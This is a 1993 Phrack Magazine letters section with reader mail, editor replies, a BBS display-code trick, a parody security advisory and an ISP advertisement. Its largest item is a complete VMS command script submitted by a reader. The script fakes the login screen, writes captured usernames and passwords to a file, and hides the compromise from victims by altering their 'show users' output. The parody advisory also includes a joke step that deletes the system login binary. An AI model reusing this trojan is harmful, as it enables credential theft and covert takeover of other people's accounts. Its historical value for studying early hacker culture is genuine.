home *** CD-ROM | disk | FTP | other *** search
/ Gold Medal Software 3 / Gold Medal Software - Volume 3 (Gold Medal) (1994).iso / misc / phrack43.arj / P43-02 < prev    next >
Text File  |  1993-07-03  |  38KB  |  955 lines

  1.                               ==Phrack Magazine==
  2.  
  3.                  Volume Four, Issue Forty-Three, File 2 of 27
  4.  
  5.                                 Phrack Loopback
  6.                                     Part I
  7.  
  8. ****************************************************************************
  9.  
  10.                                COMING NEXT ISSUE
  11.  
  12.                          Van Eck Info (Theory & Practice)
  13.    More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
  14.       HUGE University Dialup List  (Mail Us YOUR School's Dialup NOW!)
  15.                           Neato Plans For Evil Devices
  16.                                Gail Thackeray Gifs
  17.  
  18. *********************************** M A I L *********************************
  19.  
  20. Chris,
  21.  
  22. Craig Neidorf gave me these addresses as ways to reach you.  He tells me
  23. that you are currently editing Phrack.  I hope you are well.
  24.  
  25. Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
  26. eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
  27. IUP connection, was charging us an extra $1,000 per month.  They did some
  28. investigation at my request.  We determined that Phrack traffic alone was
  29. responsible for over 40% of the total bytes transferred from the site over
  30. the past year or so.  This is several gigabytes per month.  All in all, the
  31. CuD archive, which contains Phrack, CuD, and other publications accounts
  32. for 85% of our total traffic.  All of the email to and from EFF, Usenet
  33. traffic, and other FTP (from the EFF archive, the CAF archive, and others)
  34. constitutes about 15%.
  35.  
  36. EFF isn't going to be able to carry it any more because it is effectively
  37. costing us $1,000 per month.  The fundamental problem is that Phrack is so
  38. popular (at least as a free good) to cause real expense in transmission
  39. costs.  Ultimately the users are going to have to pay the costs because
  40. bandwidth (when measures in gigabytes anyway) isn't free.   The 12K per
  41. year it costs us to carry Phrack is not something which EFF can justify in
  42. its budget.  I'm sure you can understand this.
  43.  
  44. On July 1, eff.org moves from Cambridge to Washington, DC which is when I
  45. expect we will stop carrying it.  I wanted to raise this issue now to let
  46. you know in advance of this happening.
  47.  
  48. I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
  49. maintains the archive, to see whether there is anything we can do to help
  50. find another site for Phrack or make any other arrangement which will
  51. result in less loss of service.
  52.  
  53. Mitch
  54.  
  55.  
  56.  
  57. ------------------------------------------------------------------------------
  58.                 Mitchell Kapor, Electronic Frontier Foundation
  59.      Note permanent new email address for all correspondence as of 6/1/93
  60.                               mkapor@kei.com
  61.  
  62.  
  63. [Editor:  Well, all things must come to an end.  Looks like EFF's
  64.           move to Washington is leaving behind lots of bad
  65.           memories, and looking forward to a happy life in the hotbed
  66.           of American politics.  We wish them good luck.  We also
  67.           encourage everyone to join.........CPSR.
  68.  
  69.           In all fairness, I did ask Mitch more detail about the
  70.           specifics of the cost, and he explained that EFF was paying
  71.           flat rate for a fractional T-1, and whenever they went over
  72.           their allotted bandwidth, they were billed above and beyond
  73.           the flat rate.  Oh well.  Thank GOD for Len Rose.
  74.           Phrack now has a new home at ftp.netsys.com.]
  75.  
  76. ****************************************************************************
  77.  
  78.   I'm having a really hard time finding a lead to the Information
  79. America Network.  I am writing you guys as a last resort.  Could
  80. you point me in the right direction?  Maybe an access number or
  81. something?  Thanks you very much.
  82.  
  83. [Editor:  You can reach Information America voice at 404-892-1800.
  84.           They will be more than happy to send you loads of info.]
  85.  
  86. ****************************************************************************
  87.  
  88.  To whom it may concern:
  89. This is a submission to the next issue of phrack...thanks for the great
  90. 'zine!
  91. ----------------------------cut here-------------------------------
  92. Greetings Furds:
  93.  
  94.  Have you ever wanted to impress one of those BBS-babes with your astounding
  95. knowledge of board tricks?  Well *NOW* you can!  Be the life of the party!
  96. Gain and influence friends!  Irritate SysOps!  Attain the worship and
  97. admiration of your online pals.  Searchlight BBS systems (like many other
  98. software packages) have internal strings to display user information in
  99. messages/posts and the like.  They are as follows (tested on Searchlight BBS
  100. System v2.25D):
  101.  
  102.         \%A  =  displays user's access level
  103.         \%B  =  displays baud rate connected at
  104.         \%C  =  unknown
  105.         \%F  =  unknown
  106.         \%G  =  displays graphics status
  107.         \%K  =  displays user's first name
  108.         \%L  =  displays system time
  109.         \%M  =  displays user's time left on system
  110.         \%N  =  displays user's name in format: First Last
  111.         \%O  =  times left to call "today"
  112.         \%P  =  unknown
  113.         \%S  =  displays line/node number and BBS name
  114.         \%T  =  displays user's time limit
  115.         \%U  =  displays user's name in format: FIRST_LAST
  116.  
  117. All you gotta do is slam the string somewhere in the middle of a post or
  118. something and the value will be inserted for the reader to see.
  119.  
  120.  Example:  Hey there chump, I mean \%K, you better you better UL or log
  121.            off of \%S...you leach too damn many files..you got \%M mins
  122.            left to upload some new porn GIFs or face bodily harm and
  123.            mutilation!.
  124.  
  125.                       ----------------------------
  126.  
  127. Have phun!
  128. Inf0rmati0n Surfer (& Dr. Cloakenstein)
  129. SysOp Cranial Manifestations vBBS
  130.  
  131.  
  132. [Editor:  Ya know, once a LONG LONG time ago, I got on a BBS and
  133.           while reading messages noticed that a large amount of
  134.           messages seemed to be directed at ME!!#  It took me
  135.           about 10 minutes to figure it out, but BOY WAS I MAD!
  136.  
  137.           Then I added my own \%U message for the next hapless fool.
  138.           :)  BIG FUN!]
  139.  
  140. ****************************************************************************
  141.  
  142. -(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
  143.  
  144.                                  SotMESC
  145.  
  146.                    The US SotMESC Chapter is offering
  147.                  Scholarships for the 1993 school term.
  148.  
  149.               Entries should be single-spaced paragraphs,
  150.                   Double-spacing between paragraphs.
  151.  
  152.                The subject should center on an aspect of the
  153.             Computer Culture and be between 20-30 pages long.
  154.  
  155.                            Send entries to:
  156.  
  157.                                SotMESC
  158.                               PO Box 573
  159.                          Long Beach, MS 39560
  160.  
  161.     All entries submitted will become the property of the SotMESC
  162.  
  163. -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
  164.  
  165. ****************************************************************************
  166.  
  167.            The Southwest Netrunner's League's
  168. -----------------------------------------------------------------
  169.   WareZ RoDeNtZ Guide to UNIX!!!!
  170. -----------------------------------------------------------------
  171.  
  172.  Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
  173.  Assists  by:SysCon XIV       (The Ma'Bell Rapist)
  174.       Iron Man MK 4a   (Things that make ya go boom)
  175.  
  176.  This file begs to be folded, spindeled,and mutilated.
  177.  No Rights Reserved@1993
  178.  
  179. -----------------------------------------------------------------
  180.  
  181.   Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
  182.  
  183.   Coming this September.... Shadowland, 68020... Watch this space.
  184. -----------------------------------------------------------------
  185.  
  186. Part I(Basic commands)
  187.  
  188. Phile Commands: ls=List Philes
  189.   more,page=Display Phile on Yo Terminal
  190.   cp=Copy Phile
  191.   mv=Move or Remove Philes
  192.   rm=Remove Philes
  193.  
  194. Editor Commnds: vi=Screen Editor
  195.  
  196. Dirtory cmmnds: dir=Prints Directory
  197.   mkdir=Makes a new Directory(also a VERY bad bug)
  198.   rmdir=Remove a Directory
  199.   pwd=print working directory
  200.  
  201. Misc. Commands: apropos=Locate commands by keyword lookup.
  202.   whatis=Display command description.
  203.   man=Displays manual pages online.
  204.   cal=Prints calendar
  205.   date=Prints the time and date.
  206.   who=Prints out every one who is logged in
  207.       (Well, almost everyone 7:^]  )
  208.  
  209. ---------------------------------------------------------------
  210.  
  211. Part II(Security(UNIX security, another OXYMORON  7:^]  ))
  212.  
  213. If you are a useless wAReZ r0dEnT who wants to try to Netrun
  214. a UNIX system, try these logins....
  215.  
  216.  root
  217.  unmountsys
  218.  setup
  219.  makefsys
  220.  sysadm
  221.  powerdown
  222.  mountfsys
  223.  checkfsys
  224.  
  225.  
  226. All I can help ya with on da passwords iz ta give you some
  227. simple guidelines on how they are put together....
  228.  
  229.  6-8 characters
  230.  6-8 characters
  231.  1 character is a special character (exmpl:# ! ' & *)
  232.  
  233. -----------------------------------------------------------------
  234.  
  235. Well thats all fo' now tune in next time, same Hack-time
  236.        same Hack-channel!!!
  237.  
  238.  
  239.  THE TECHNOMANCER           I have taken all knowledge
  240.    af604@FreeNet.hsc.colorado.edu
  241.                                    to be my province
  242.  
  243. --
  244. Technomancer
  245. Southwest Netrunner's League
  246.  
  247. *****************************************************************
  248.  
  249. [Editor:  This is an example of what NOT to send to Phrack.
  250.           This is probably the worst piece of garbage I've
  251.           received, so I had to print it.  I can only hope
  252.           that it's a private joke that I just don't get.
  253.  
  254.           Uh, please don't try to write something worse and
  255.           submit it hoping to have it singled out as the
  256.           next "worst," since I'll just ignore it.]
  257.  
  258. ****************************************************************************
  259.  
  260. Dear Phrack,
  261.    I was looking through Phrack 42 and noticed the letters about password
  262. stealers. It just so happened that the same day I had gotten extremely
  263. busted for a program which was infinitely more indetectible. Such is life.
  264. I got off pretty well being an innocent looking female so it's no biggie.
  265. Anyway, I deleted the program the same day because all I could think was
  266. "Shit, I'm fucked". I rewrote a new and improved version, and decided to
  267. submit it. The basic advantages of this decoy are that a) there is no
  268. login failure before the user enters his or her account, and b) the
  269. program defines the show users command for the user so that when they
  270. do show users, the fact that they are running out of another account
  271. doesn't register on their screen.
  272.    There are a couple holes in this program that you should probably be
  273. aware of. Neither of these can kick the user back into the account that
  274. the program is running from, so that's no problem, but the program can
  275. still be detected. (So basically, don't run it out of your own account...
  276. except for maybe once...to get a new account to run it out of) First, once
  277. the user has logged into their account (out of your program of course) hitting
  278. control_y twice in a row will cause the terminal to inquire if they are
  279. doing this to terminate the session on the remote node. Oops. It's really no
  280. problem though, because most users wouldn't even know what this meant. The
  281. other problem is that, if the user for some strange reason redefines show:
  282.  
  283. $show == ""
  284.  
  285. then the show users screen will no longer eliminate the fact that the account
  286. is set host out of another. That's not a big deal either, however, because
  287. not many people would sit around randomly deciding to redefine show.
  288.    The reason I was caught was that I (not even knowing the word "hacker"
  289. until about a month ago) was dumb enough to let all my friends know about the
  290. program and how it worked. The word got spread to redefine show, and that's
  291. what happened. The decoy was caught and traced to me. Enough BS...here's the
  292. program. Sorry...no UNIX...just VMS.
  293.                                             Lady Shade
  294.  
  295. I wrote the code...but I got so many ideas from my buddies:
  296. Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
  297.  
  298. ------------------------------------------------
  299.  
  300. $if p1 .eqs. "SHOW" then goto show
  301. $sfile = ""
  302. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  303. !!!! The role of the dummy file in this program is to tell if the program !!!!
  304. !!!! is being used as a decoy or as a substitute login for the victim. It !!!!
  305. !!!! does not stay in your directory after program termination.           !!!!
  306. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  307. $sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
  308. $if sfile .nes. "" then goto other
  309. $open/write io user.dat
  310. $close io
  311. $open/write dummy instaar_device:[miller_g]dummy.txt
  312. $close dummy
  313. $wo == "write sys$output"
  314. $line = ""
  315. $user = ""
  316. $pass = ""
  317. $a$ = ""
  318. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  319. !!!! A login screen with a message informing someone of new mail wouldnt !!!!
  320. !!!! be too cool...                                                      !!!!
  321. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  322. $set broadcast=nomail
  323. $set message/noidenficitaion/noseverity/nofacility/notext
  324. $on error then goto outer
  325. $!on control_y then goto inner
  326. $wo " [H [2J"
  327. $wo ""
  328. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  329. !!!! insert a fake logout screen here !!!!
  330. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  331. $wo "   ZJABAD_X     logged out at ", f$time()
  332. $wo " [2A"
  333. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  334. !!!! This is the main body of the program. It simulates the system login !!!!
  335. !!!! screen. It also grabs the username and password and sticks them in  !!!!
  336. !!!! a file called user.dat                                              !!!!
  337. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  338. $outer:
  339. $set term/noecho
  340. $inquire a$/nopun ""
  341. $inquire a$/nopun ""
  342. $set term/echo
  343. $c = 0
  344. $c1 = 0
  345. $c2 = 0
  346. $inner:
  347. $c2 = c2 + 1
  348. $if c2 .eqs. 5 then goto speedup
  349. $c = c + 1
  350. $if c .eqs. 15 then goto fail
  351. $if c1 .eqs. 3 then goto fail3
  352. $user = "a"
  353. $wo "Username: "
  354. $from_speedup:
  355. $set term/uppercase
  356. $wo " [2A"
  357. $read/time_out=10/prompt=" [9C " sys$command user
  358. $if user .eqs. "a" then goto timeout
  359. $set term/nouppercase
  360. $if user .eqs. "" then goto inner
  361. $set term/noecho
  362. $inquire pass "Password"
  363. $set term/echo
  364. $if user .eqs. "ME" then goto done
  365. $if pass .eqs. "" then goto fail
  366. $open/append io user.dat
  367. $write io user + " " + pass
  368. $close io
  369. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  370. !!!! Sends the user into their account !!!!
  371. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  372. $open/write io set.com
  373. $write io "$set host 0"
  374. $write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
  375. $write io pass
  376. $close io
  377. $@set
  378. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  379. !!!! Control has been returned to your account !!!!
  380. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  381. $write io " [2A"
  382. $goto outer
  383. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  384. !!!! Simulates a failure if the password is null, and also if the !!!!
  385. !!!! username prompt has cycled through 15 times... This is what  !!!!
  386. !!!! the system login screen does.                                !!!!
  387. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  388. $fail:
  389. $c = 1
  390. $c1 = c1 + 1
  391. $wo "User authorization failure"
  392. $wo " [1A"
  393. $goto inner
  394. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  395. !!!! After the third failure, the system usually sends the screen back !!!!
  396. !!!! one step...this just handles that.                                !!!!
  397. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  398. $fail3:
  399. $wo " [2A"
  400. $goto outer
  401. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  402. !!!! The system keeps a timeout check in the login. If a username is not !!!!
  403. !!!! entered quickly enough, the timeout message is activated            !!!!
  404. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  405. $timeout:
  406. $set term/nouppercase
  407. $wo "Error reading command input"
  408. $wo "Timeout period expired"
  409. $wo " [2A"
  410. $goto outer
  411. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  412. !!!! There is a feature in this program which sets the terminal to        !!!!
  413. !!!! uppercase for the input of a username. This is wonderful for         !!!!
  414. !!!! preventing program detection, but it does cause a problem. It slows  !!!!
  415. !!!! the screen down, which looks suspicious. So, in the case where a     !!!!
  416. !!!! user walks up tot he terminal and holds the return key down for a    !!!!
  417. !!!! bit before typing in their username, this section speeds up the run  !!!!
  418. !!!! considerably.                                                        !!!!
  419. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  420. $speedup:
  421. $set term/nouppercase
  422. $fast_loop:
  423. $user = "a"
  424. $read/time_out=1/prompt="Username: " sys$command io
  425. $if user .eqs. "a" then goto from_speedup
  426. $goto fast_loop
  427. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  428. !!!! This section is optional. There are many ways that you can implement !!!!
  429. !!!! to break out of the program when you think you have gotten enough    !!!!
  430. !!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
  431. !!!! for the username and pass which kicks you out. If this option is     !!!!
  432. !!!! implemented, you should at least put in something that looks like    !!!!
  433. !!!! you have just logged in, the program should not kick straight back   !!!!
  434. !!!! to your command level, but rather execute your login.com. 2) You     !!!!
  435. !!!! can log in to the account which is stealing the password from a      !!!!
  436. !!!! different terminal and stop the process on the account which is      !!!!
  437. !!!! running the program. This is much safer, and my recommandation.      !!!!
  438. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  439. $done:
  440. $set broadcast=mail
  441. $set message/facility/text/identification/severity
  442. $delete dummy.txt;*
  443. $exit
  444. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  445. !!!! This section is how one covers up the fact that the account which has !!!!
  446. !!!! been stolen is running out of another. Basically, the area of the show!!!!
  447. !!!! users screen which registers this is at the far right hand side.      !!!!
  448. !!!! This section first writes the show users data to a file and alters    !!!!
  449. !!!! it before it is written to the screen for viewing by the user. There  !!!!
  450. !!!! may exist many forms of the show users command in your system, and    !!!!
  451. !!!! you may have to handle each one differently. I have written only two  !!!!
  452. !!!! manipulations into this code to be used as an example. But looking    !!!!
  453. !!!! at how this is preformed should be enough to allow you to write your  !!!!
  454. !!!! own special cases. Notice that what happens to activate this section  !!!!
  455. !!!! of the program is the computer detects the word "show" and interprets !!!!
  456. !!!! it as a procedure call. The words following show become variables     !!!!
  457. !!!! passed into the program as p1, p2, etc. in the order which they       !!!!
  458. !!!! were typed after the word show. Also, by incorporating a third data   !!!!
  459. !!!! file into the manipulations, one can extract the terminal id for the  !!!!
  460. !!!! account which the program is running out of and plug this into the    !!!!
  461. !!!! place where the user's line displays his or her terminal id. Doing    !!!!
  462. !!!! this is better that putting in a fake terminal id, but that is just a !!!!
  463. !!!! minor detail.                                                         !!!!
  464. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  465. $show:
  466. $show = ""
  467. $show$ = ""
  468. $length = 0
  469. $ch = ""
  470. $full = 0
  471. $c = 0
  472. $if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
  473. $if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
  474. $if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
  475. $if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
  476. $if p3 .eqs. "" then goto fallout
  477. $goto full
  478. $fallout:
  479. $show 'p2' 'p3'
  480. $exit
  481. $ufull:
  482. $show users/full/output=users.dat
  483. $goto manipulate
  484. $full:
  485. $show$ = p3 + "/output=users.dat"
  486. $show users 'show$'
  487. $manipulate:
  488. $set message/nofacility/noseverity/notext/noidentification
  489. $open/read io1 users.dat
  490. $open/write io2 users2.dat
  491. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  492. !!!! Control_y must be dealt with here. If the user did happen to controlY !!!
  493. !!!! there is a chance that the files users.dat and users2.dat could be    !!!
  494. !!!! left in their directory. That is a bad thing as we are trying to      !!!
  495. !!!! prevent detection :)                                                  !!!
  496. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  497. $on control_y then goto aborted
  498. $user = ""
  499. $test = ""
  500. $long = ""
  501. $ch = ""
  502. $length = 0
  503. $user = f$user()
  504. $length = f$length(user) - 2
  505. $user = f$extract(1,length,user)
  506. $read_loop:
  507. $read/end_of_file=eof io1 line
  508. $test = f$extract(1,length,line)
  509. $ch = f$extract (length+1,1,line)
  510. $if (test .eqs. user) .and. (ch .eqs. " ") then goto change
  511. $from_change:
  512. $write io2 line
  513. $goto read_loop
  514. $eof:
  515. $close io1
  516. $close io2
  517. $type users2.dat
  518. $del users.dat;*
  519. $del users2.dat;*
  520. $show == "@instaar_device:[MILLER_G]findnext show"
  521. $set message/facility/text/severity/identification
  522. $exit
  523. $change:
  524. $if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
  525. $goto from_change
  526. $aborted:
  527. $!if f$search("users.dat") .nes. "" then close io1
  528. $!if f$search("users.dat") .nes. "" then delete users.dat;*
  529. $!if f$search("users2.dat") .nes. "" then close io2
  530. $!if f$search("users2.dat") .nes. "" then delete users2.dat;*
  531. $close io1
  532. $close io2
  533. $delete users.dat;*
  534. $delete users2.dat;*
  535. $show == "@instaar_device:[MILLER_G]findnext show"
  536. $set message/facility/text/severity/identification
  537. $exit
  538. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  539. !!!! This is the section of the program which is executed in place of the !!!!
  540. !!!! users login.com. It does grab their login and execute it to prevent  !!!!
  541. !!!! suspicion, but there are a couple of hidden commands which are also  !!!!
  542. !!!! added. They redefine the show and sys commands so that the user can  !!!!
  543. !!!! not detect that he or she is riding off of another account.          !!!!
  544. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  545. $other:
  546. $sh$ = "@instaar_device:[miller_g]findnext show"
  547. $shline = "$sh*ow ==" + sh$
  548. $logi = ""
  549. $logi = f$search("login.com")
  550. $if logi .NES. "" then goto Ylogin
  551. $nologin:
  552. $open/write io login2.com
  553. $write io shline
  554. $close io
  555. $@login2
  556. $delete login2.com;*
  557. $exit
  558. $ylogin:
  559. $open/write io2 login2.com
  560. $open/read io1 login.com
  561. $transfer_loop:
  562. $read/end_of_file=ready io1 line
  563. $write io2 line
  564. $goto transfer_loop
  565. $ready:
  566. $write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
  567. $close io1
  568. $close io2
  569. $@login2
  570. $delete login2.com;*
  571. $exit
  572.  
  573.  
  574. [Editor:  Thanks for the letter and program.  I wish I could bring
  575.           myself to use a VMS and try it out.  :)  Always happy
  576.           to get notice that somewhere out there a female reads
  577.           Phrack.  By the way, "innocent female" is an oxymoron.]
  578.  
  579. ****************************************************************************
  580.  
  581. To:   Phrack Loopback.
  582. From: White Crocodile.
  583.  
  584. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  585.  Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports"  is
  586.  really cool invention and I (sorry for egoisthic "I") with  pleasure
  587.  wasting time for his reading ( ex. my playboy time ). But  here  for
  588.  some unknown reason appear equal  style,  and  all  loopback  remind
  589.  something medium between "relations search" [Hello Dear Phrack, I am
  590.  security expert of our local area, but when I looked  to  output  of
  591.  "last" program (oh,yeah - "last" it is ...), I ocassionaly  under  -
  592.  standed  what apparently someone elite  hacker  penetrated  into  my
  593.  unpassworded  account!  But  how  he  knew  it???  I  need  to  talk
  594.  with him! Please mail me at security@...] and "make yourself" [Yep.I
  595.  totally wrote program which gets file listing from target  vicitim's
  596.  home directory in current host. After that I decided  to  contribute
  597.  it for You. I hope this will help. Here is the complete C code. "rx"
  598.  permission in target's '$HOME' required.].
  599.   Looking similar articles like "... off Geek!" and  various  reports
  600.  which don't reacheds PWN. [CENSORED BY ME].
  601.   Resulting from abovewritten reason and I let  myself  to  add  some
  602.  elite (oops word too complex), some bogus and little deposit to Your
  603.  lb. He written in classic plagiarize style.
  604. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  605.                              *  *  *
  606. Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
  607. it is horrible (don't read it please - this message to Bart),  but  I
  608. doing it all the time (today already 3 month). I have not much time to
  609. write, and here is the subject - I broke into  one  military  computer
  610. and stole their mail about new security bug!!! l00k f3r |t:
  611.  
  612.                                 - - -
  613.           DDN & CERT
  614.                             SPECIAL REPORT*
  615.           Sun 3.x,4.1.x login flaw
  616.  
  617. Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
  618.                                        and many yet unknown systems)
  619.  
  620. Impact: Allow random intruders to gain "root" access.
  621.  
  622. Description:
  623.    The huge security hole was there and waiting! Type:
  624.  
  625.      $ login root
  626.  
  627.    [ no option required ], and You are! All what You need to know its
  628.    just root's password, but it (pw), sure, can be easily obtained from
  629.    real root, by asking him (root). Ex - "$ talk root"
  630.  
  631. Possible fix until copyrighted patch come out:
  632.  
  633.      #rm /usr/bin/login
  634.      #cp /usr/games/fortune /usr/bin/login
  635.  
  636. If you believe that your system has been compromised, contact CERT CC. Call
  637. our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in  time
  638. of "Silence of the Lamb"), leave Inet address of your system and  number of
  639. private credit card.
  640.                                - - -
  641.  
  642. * Report not will be printed in cert advisories in this form, becouse FBI
  643.    need remove all hints and tips, and make him useless to intruders.
  644.  
  645. DISCLAIMER: Above document written by CERT, DDN and FBI -
  646.                                       all pretension to them.
  647.  
  648. Thanks to gr*k (I can't write his full name for security reasons),roxtar,
  649. y0,Fidelio,2 scotts from Santafe,KL (He not have attitude  towards  this
  650. mail,but I included him for polite since he reserved tickets for me  to
  651. SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
  652. hints to me, what this bug really exist (Yep, before I stoled report).
  653.  
  654.  - Write You later - anonymous.
  655.  
  656. P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
  657. and sure Erik Bloodaxe. And also - IF after E911 incident you are more
  658. carefully, feel free to replace "stole" to "got" (when you'll post it),  and
  659. do not forget to add "reprinted with permission".
  660.  
  661.  - Sincerely, anonymous.
  662.  
  663. ----------------------------------------------------------------------
  664.  
  665. [Editor:  More indications that we will all be raided by the DEA
  666.           more often than the FBI in coming years.]
  667.  
  668. *****************************************************************************
  669.  
  670.  
  671.  "Since my probation status forces me to be adamant about this. Illegal
  672.   activities on Netsys cannot and will not be tolerated. Prison sucked."
  673.  
  674.                                     - Len Rose
  675.  
  676.  06/6/93
  677.  
  678.  NETSYS COMMUNICATION SERVICES  Palo Alto, California
  679.  
  680.  Netsys is a network of large Sun servers dedicated to providing
  681.  Internet access to individuals and corporations that need solid,
  682.  reliable Internet connectivity.  Netsys is at the hub of major
  683.  Internet connectivity.
  684.  
  685.  Netsys is a system for professionals in both the Internet and Unix
  686.  community. The public image is important to us. Illegal activities
  687.  cannot be tolerated.
  688.  
  689.  Netsys has every feature you could possibly need.
  690.  
  691.  Netsys is lightly loaded, extremely reliable and dedicated to providing
  692.  full time 24 hour Internet access.
  693.  
  694.  Support: 24 hour emergency response service.
  695.  
  696.  Dialups: Palo Alto area, High Speed (V.32 and PEP)
  697.  
  698.  Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)
  699.  
  700.                    $1 per megabyte per month over 5 megabytes.
  701.  
  702.  Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
  703.                       $1 per megabyte per month over 10 megabytes.
  704.  
  705.  Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
  706.             newsgroups, and including all foreign newsgroups.
  707.  
  708.                SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE
  709.  
  710.  Satellite Weather: Netsys has available real time satellite weather
  711.                     imagery. Images are available in gif, or Sun raster
  712.                     format. Contact us for NFS mirroring, and other special
  713.                     arrangement. These images are directly downlinked from
  714.                     the GOES bird. Contact Steve Eigsti (steve@netsys.com)
  715.  
  716.  Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service
  717.  
  718.                    for large volume news distribution. Members of Netsys
  719.                    can obtain substantial discounts for the purchase and
  720.                    service costs of this revolutionary method of Usenet news
  721.                    distribution.  Both Unix and MS Windows software available.
  722.                    Contact (pagesat@pagesat.com) for product information.
  723.  
  724.  Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
  725.                   Members of Netsys can obtain critical email to pager
  726.                   services. Pagesat has the ability to gateway any critical
  727.                   electronic mail to your display pager.
  728.  
  729.                       Leased Line Internet Connections
  730.  
  731.   Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
  732.   United States. Since Pagesat is an FCC common carrier, our savings on
  733.   leased lines can be passed on to you. For further information, contact
